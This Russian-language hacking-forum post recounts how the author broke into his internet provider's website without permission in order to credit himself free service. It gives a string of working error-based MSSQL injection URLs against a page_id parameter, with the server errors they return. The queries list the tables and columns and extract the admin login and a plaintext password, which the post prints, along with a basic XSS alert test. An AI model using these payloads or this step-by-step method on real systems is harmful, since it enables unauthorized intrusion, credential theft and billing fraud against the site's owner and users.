Форум АНТИЧАТ - MSSQL-injection

Вступление

Сидел я дома, скучно, решил поискать баги на сайте своего прова. Нашёл несколько бестолковых XSS но для прова довольно глупых, на странице входа в свой счёт в форме ввода пароля срабатывал простейший код алерта:

Код:

<script>alert()<script>

Но XSS меня не интересовали. Моей целью было попасть в админку сайта, где можно было начилсять деньги на инет))
Нашёл MSSQL-Injection, но так как я не особо в этом шарил прочитал статью, спросил на форуме (gadjet'y спасибо). И начал копать...

Реализация MSSQL-инъекции

Для начала мне надо было знать имена таблиц в базе данных, для этого выполним следующий запрос, который возвратит нам имя первой таблицы:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Этот запрос возвратил мне следующее:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'DAYS_SERV_ORD_PAY_BAL' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

DAYS_SERV_ORD_PAY_BAL - это и есть имя первой таблицы в базе данных.
Далее чтобы узнать имя второй таблицы, выполняем следующий запрос:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SERV_ORD_PAY_BAL'))--

После выполнения этого запроса, скрипт вернул мне следующее

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'X_Count_Of_Jeo_Modems' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Где, X_Count_Of_Jeo_Modems - как вы уже догадались, имя второй таблицы.
Чтобы узнать имя третей таблицы выполняем следующий запрос

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SERV_ORD_PAY_BAL','X_Count_Of_Jeo_Modems'))--

В общем технология думаю ясна, для тех кто не понял, в скобки через запятую в кавычках нужно добавлять имя таблицы, которое возвращает скрипт.
После того как я узнал имена где т 40 таблиц, и не нашёл нужной мне таблицы, решил попробовать следующий запрос:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25login%25')--

Этот запрос возвращает нам имя таблицы которая соответствует критерию login:
Запрос вернул мне следующее:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'RAS_Accounts_AutoLogins' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Но это было не то что мне нужно, я решил попробовать вместо login подставить admin, и тут мне повезло)
Срипт возвратил мне следующее:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Далее мне нужно было узнать имена столбцов в таблице admin, для этого выполняем слудеющий запрос:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin')--

Вернуло мне:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Login' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Чтобы узнать имя следующего столбца выполняем запрос:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+AND+COLUMN_NAME+NOT+IN+('login'))--

Скрипт вернул мне:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_password' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Продолжая мы получим остальные имена столбцов, пока скрипт не вернёт следующую ошибку:

Код:

error '80020009'



Exception occurred.



/Shared/Functions/InterfaceFunctions.asp, line 86

Теперь зная имена столбцов мы можем получить нужные нам данные.
Выполним запрос который вернёт нам логин админа:

Код:

http://sait-prova.ru/?page_id=(SELECT+TOP+1+Login+FROM+admin)--

Скрипт вернул следующее:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'MW-056417' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Так логин есть, это - MW-056417
Теперь узнаём пароль, запрос следующий:

Код:

(UNION+SELECT+TOP+1+admin_password+FROM+admin)--

Скрипт возвращает:

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'f1Ab7wxt2' to a column of data type smallint.



/Shared/Functions/F2.asp, line 76

Пароль в бд находился в чистом виде))

Ну вот собственно и всё. Спасибо gadjet'y за помощь.